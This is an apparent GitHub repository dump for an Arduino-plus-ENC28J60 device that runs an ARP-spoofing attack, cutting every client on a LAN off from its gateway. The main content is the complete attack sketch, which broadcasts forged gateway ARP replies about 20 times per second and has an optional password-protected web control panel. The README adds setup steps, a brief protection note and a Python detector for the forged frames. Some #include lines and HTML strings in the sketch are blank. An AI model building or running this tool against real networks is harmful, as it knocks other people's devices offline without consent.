├── images
    ├── 1.jpg
    ├── 2.jpg
    ├── 3.jpg
    └── patreon.png
├── .gitignore
├── LICENSE
├── README.md
└── ARPspoofer
    └── ARPspoofer.ino

/images/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/spacehuhn/ArduinoARPspoof/HEAD/images/1.jpg
--------------------------------------------------------------------------------
/images/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/spacehuhn/ArduinoARPspoof/HEAD/images/2.jpg
--------------------------------------------------------------------------------
/images/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/spacehuhn/ArduinoARPspoof/HEAD/images/3.jpg
--------------------------------------------------------------------------------
/images/patreon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/spacehuhn/ArduinoARPspoof/HEAD/images/patreon.png
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
# Object files
*.o
*.ko
*.obj
*.elf

# Precompiled Headers
*.gch
*.pch

# Libraries
*.lib
*.a
*.la
*.lo

# Shared objects (inc. Windows DLLs)
*.dll
*.so
*.so.*
*.dylib

# Executables
*.exe
*.out
*.app
*.i*86
*.x86_64
*.hex

# Debug files
*.dSYM/
*.su
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2017 Stefan Kremser

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Arduino ARP-Spoof
Kicks out everyone in your LAN with Arduino and an ENC28J60 ethernet controller.

![ENC28J60 ethernet shield + Arduino nano plugged in and working](https://raw.githubusercontent.com/spacehuhn/enc28j60_ARPspoofer/master/images/1.jpg)

**Support me and my projects on [Patreon!](https://www.patreon.com/spacehuhn)**

## Contents
- [Introduction](#introduction)
  - [What it is](#what-it-is)
  - [How it works](#how-it-works)
  - [What an ENC28J60 is](#what-an-enc28j60-is)
  - [How to protect against it](#how-to-protect-against-it)
- [Disclaimer](#disclaimer)
- [Installation](#installation)
- [How to use it](#how-to-use-it)
- [License](#license)
- [Sources and additional links](#sources-and-additional-links)

## Introduction

### What it is

Using an Arduino with an ethernet controller, this device will perform an [ARP spoofing](https://en.wikipedia.org/wiki/ARP_spoofing) attack to block the communication from every client device in your LAN to the gateway.

### How it works

It will constantly send ARP replies to every device in the LAN and tell them that the gateway is at a random MAC address.
The gateway is the link between your local network and the internet. By telling everyone it's at an address that doesn't exist, nobody will be able to communicate with it anymore and, as a result, they lose the connection.

### What an ENC28J60 is

The ENC28J60 is a cheap 10 Mbit SPI ethernet controller for Arduino. Because it has a very open and easily hackable library, it's perfect for this project and you could even program a man-in-the-middle attack or other funny stuff with it.

![ENC28J60 ethernet shield and an Arduino nano](https://raw.githubusercontent.com/spacehuhn/enc28j60_ARPspoofer/master/images/2.jpg)

### How to protect against it

Use a router, network switch or software that provides you protection against ARP spoofing.
Note: I haven't tested it on such protected hardware yet.

## Disclaimer

**Use it only for testing purposes on your own network!**

## Installation

You will need an Arduino and an ENC28J60.
If you buy an Arduino ethernet shield be sure it **doesn't** use a wiznet controller (e.g. w5100 or w5500), **this project will only work with an ENC28J60!**

**1. Wire everything up**

To do this you need to connect both the Arduino and the controller via their SPI pins. If you're unsure how to do this, you can google for the pinout of your Arduino and the ethernet controller. There are different versions of the ENC28J60 out there. I'm using a shield for the Arduino nano.

**2. Install library**

You will need to add the ethercard library in Arduino.
How to do that is explained here: https://github.com/jcw/ethercard

**3. [Optional] Change some settings**

A few settings that you can change are declared at the beginning of the sketch.
```
// ===== Settings ===== //
//#define webinterface /* <-- uncomment that if you want to use the webinterface */
//#define debug /* <-- uncomment that if you want to get a serial output */
#define led 13
#define auth_password "ARP"
int packetRate = 20; //packets sent per second
static uint8_t mymac[] = { 0xc0, 0xab, 0x03, 0x22, 0x55, 0x99 };
```

**4. Upload the code**

Compile & upload the sketch to your Arduino and you are done :)

## How to use it

Power it over USB and plug in an ethernet cable.

**Using the WebInterface:**
If you uncommented `webinterface` in the code, the Arduino won't start the attack by itself.
You have to open its website and start the attack manually.
The IP will be printed out in the serial monitor and the default password is `ARP`.
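
For the "How to protect against it" section above, a detection check added here as an example (it is not part of the original repository): it parses ARP frames and reports the traits of the reply this sketch sends, namely a reply that claims the gateway IP with an unexpected MAC, is addressed to Ethernet broadcast, and targets 255.255.255.255. The known-good gateway MAC and the benign frame are constructed sample values; the spoofed frame is constructed from the sketch's `_data` layout with the `mymac` and placeholder gateway IP bytes shown on this page.

```python
import struct

BROADCAST_MAC = b"\xff" * 6
GATEWAY_IP = bytes([192, 168, 2, 1])         # placeholder gateway IP bytes from the sketch
GATEWAY_MAC = bytes.fromhex("020000000001")  # constructed: the real gateway's MAC

# Constructed frame following the sketch's _data layout with mymac filled in (48 bytes).
SPOOFED = bytes.fromhex(
    "ffffffffffff" "c0ab03225599" "0806" "0001" "0800" "0604" "0002"
    "c0ab03225599" "c0a80201" "ffffffffffff" "ffffffff" "000000000000")
# Constructed benign frame: the real gateway answering one client by unicast.
BENIGN = bytes.fromhex(
    "020000000002" "020000000001" "0806" "0001" "0800" "0604" "0002"
    "020000000001" "c0a80201" "020000000002" "c0a80232")

def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4 ARP."""
    if len(frame) < 42:
        return None
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    htype, ptype, hlen, plen, opcode = struct.unpack("!HHBBH", frame[14:22])
    if ethertype != 0x0806 or (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    sha, spa, tha, tpa = struct.unpack("!6s4s6s4s", frame[22:42])
    return {"eth_dst": eth_dst, "eth_src": eth_src, "opcode": opcode,
            "sha": sha, "spa": spa, "tha": tha, "tpa": tpa}

def findings(frame, gateway_ip=GATEWAY_IP, gateway_mac=GATEWAY_MAC):
    """List the reasons a frame looks like gateway ARP poisoning (empty = clean)."""
    arp = parse_arp(frame)
    if arp is None or arp["opcode"] != 2:    # only ARP replies are of interest
        return []
    reasons = []
    if arp["spa"] == gateway_ip and arp["sha"] != gateway_mac:
        reasons.append("gateway IP claimed by unexpected MAC")
    if arp["eth_dst"] == BROADCAST_MAC:      # supporting signal, not proof on its own
        reasons.append("ARP reply sent to Ethernet broadcast")
    if arp["tpa"] == b"\xff" * 4:
        reasons.append("target IP is 255.255.255.255")
    return reasons

def scan(frames):
    """Return (index, reasons) for every frame with at least one finding."""
    return [(i, r) for i, r in enumerate(map(findings, frames)) if r]

if __name__ == "__main__":
    for index, reasons in scan([BENIGN, SPOOFED, SPOOFED]):
        print(index, "; ".join(reasons))
```

At the default `packetRate` of 20, a capture on an affected segment would show this pattern repeating about twenty times per second from one source MAC.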

![WebInterface](https://raw.githubusercontent.com/spacehuhn/enc28j60_ARPspoofer/master/images/3.jpg)

## License

This project is licensed under the MIT License - see the [license file](LICENSE) for details.

## Sources and additional links

ARP spoofing: https://en.wikipedia.org/wiki/ARP_spoofing
ENC28J60: http://www.microchip.com/wwwproducts/en/en022889
--------------------------------------------------------------------------------
/ARPspoofer/ARPspoofer.ino:
--------------------------------------------------------------------------------
/*
  ===========================================
       Copyright (c) 2017 Stefan Kremser
              github.com/spacehuhn
  ===========================================
*/

#include
#include
#include

// ===== Settings ===== //
//#define webinterface /* <-- uncomment that if you want to use the webinterface */
//#define debug /* <-- uncomment that if you want to get a serial output */
#define led 13
#define auth_password "ARP"
int packetRate = 20; //packets send per second
static uint8_t mymac[] = { 0xc0, 0xab, 0x03, 0x22, 0x55, 0x99 };

#ifdef webinterface
byte Ethernet::buffer[700];
#else
byte Ethernet::buffer[400];
#endif

int arp_count = 0;
unsigned long prevTime = 0;
bool connection = false;
bool toggle_status = false;
bool tmp_status = true;

//ARP reply packet
uint8_t _data[48] = {
  /* 0 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, //destination MAC
  /* 6 */ 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, //source MAC
  /* 12 */ 0x08, 0x06, //frame type (ARP)
  /* 14 */ 0x00, 0x01, //ethernet
  /* 16 */ 0x08, 0x00, //ipv4
  /* 18 */ 0x06, 0x04, //size, protocol size
  /* 20 */ 0x00, 0x02, //opcode (1:request, 2:reply)
  /* 22 */ 0x01, 0x01, 0x01, 0x01c, 0x01, 0x01, //source MAC
  /* 28 */ 0xc0, 0xa8, 0x02, 0x01, //source IP
  /* 32 */ 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, //destination MAC
  /* 38 */ 0xFF, 0xFF, 0xFF, 0xFF, //destination IP (255.255.255.255)
};

bool sendARP() {
  long curTime = millis();

  if (curTime - prevTime > 1000/packetRate) {
    digitalWrite(led, HIGH);

    for (int i = 0; i < 48; i++) ether.buffer[i] = _data[i];
    ether.packetSend(48);
    arp_count++;
    prevTime = curTime;

    digitalWrite(led, LOW);

#ifdef debug
    Serial.println("ARP PACKET SENT");
#endif

    return true;
  }

  return false;
}

void _connect() {
  if (!ether.dhcpSetup()) {
#ifdef debug
    Serial.println("DHCP failed");
#endif
    connection = false;
  } else {
#ifdef debug
    ether.printIp("My IP: ", ether.myip);
    ether.printIp("Netmask: ", ether.netmask);
    ether.printIp("GateWay IP: ", ether.gwip);
    ether.printIp("DNS IP: ", ether.dnsip);
#endif

    //set gateway IP
    for (int i = 0; i < 4; i++) _data[28 + i] = ether.gwip[i];

    //set fake MAC
    for (int i = 0; i < 6; i++) _data[6 + i] = _data[22 + i] = mymac[i];

    //fill buffer
    for (int i = 0; i < 48; i++) ether.buffer[i] = _data[i];

    connection = true;
  }
}

void setup() {
  pinMode(led, OUTPUT);

#ifdef debug
  Serial.begin(115200);
  delay(2000);
  Serial.println("ready!");
  Serial.println("waiting for LAN connection...");
#endif

  if (ether.begin(sizeof Ethernet::buffer, mymac) == 0) {
#ifdef debug
    Serial.println( "Failed to access Ethernet controller");
#endif
  }

  while (!connection) {
    _connect();
    delay(1000);
  }

}

void loop() {
#ifdef webinterface

  char len = ether.packetReceive();
  char pos = ether.packetLoop(len);
  tmp_status = false;

  if (pos) {
    boolean password_valid = true;

    // is it a POST request?
    if (strstr((char *)Ethernet::buffer + pos, "POST /") != 0) {

#ifdef debug
      Serial.println("New Post Request!");
#endif

      // search and verify the password
      String password = "";
      char* password_position = strstr((char *)Ethernet::buffer + pos, "pwd=");
      if (password_position != 0) {
        password = String(password_position).substring(4);

        password = password.substring(0,password.indexOf("&O"));

#ifdef debug
        Serial.println("Found password: '" + (String)password + "'");
#endif
        if(password == auth_password) {
#ifdef debug
          Serial.println("password correct :)");
#endif
        } else {
#ifdef debug
          Serial.println("wrong password! :(");
#endif
          password_valid = false;
        }

        if(password_valid){
          // OFF command
          if (strstr((char *)Ethernet::buffer + pos, "&OFF=") != 0) {
            if (toggle_status) {
#ifdef debug
              Serial.println("attack: OFF");
#endif
              toggle_status = false;
              tmp_status = true;
            }

          // ON command
          } else if (strstr((char *)Ethernet::buffer + pos, "&ON=") != 0) {
#ifdef debug
            Serial.println("attack: ON");
#endif
            toggle_status = true;
            tmp_status = true;
          } else {
#ifdef debug
            Serial.println("unknown command");
#endif
          }
        }
      }
    } else {
      tmp_status = true;
    }

    // Output HTML page
    BufferFiller bfill = ether.tcpOffset();

    bfill.emit_p(PSTR(
      "HTTP/1.0 200 OK\n"
      "Content-Type: text/html\n\n"
      ""
      ""
      ""
      "ARP Panel"
      ""
      ""
      ""
      "ARP Spoofer - WebPanel"
      "More info on the GitHub page"
      ""
      ""
    ));

    // Enable / disable buttons based on the output status
    if (toggle_status == true) bfill.emit_p(PSTR(""));
    else bfill.emit_p(PSTR(""));

    bfill.emit_p(PSTR(""));

    if(!password_valid) bfill.emit_p(PSTR("Wrong password!"));

    long t = millis() / 1000;
    word h = t / 3600;
    byte m = (t / 60) % 60;
    byte s = t % 60;
    bfill.emit_p(PSTR("Uptime: $D$D:$D$D:$D$D"), h / 10, h % 10, m / 10, m % 10, s / 10, s % 10);
    bfill.emit_p(PSTR("ARP packets sent: $D"), arp_count);

    bfill.emit_p(PSTR(""));
    ether.httpServerReply(bfill.position());
  } else {
    tmp_status = true;
    if (connection && toggle_status && tmp_status) {
      sendARP();
      tmp_status = false;
    } else {
      digitalWrite(13, LOW); // No Connection, turn off STATUS LED
    }
  }

#else
  if (connection) sendARP();
  else digitalWrite(led, LOW); //No Connection, turn off STATUS LED
#endif
}

--------------------------------------------------------------------------------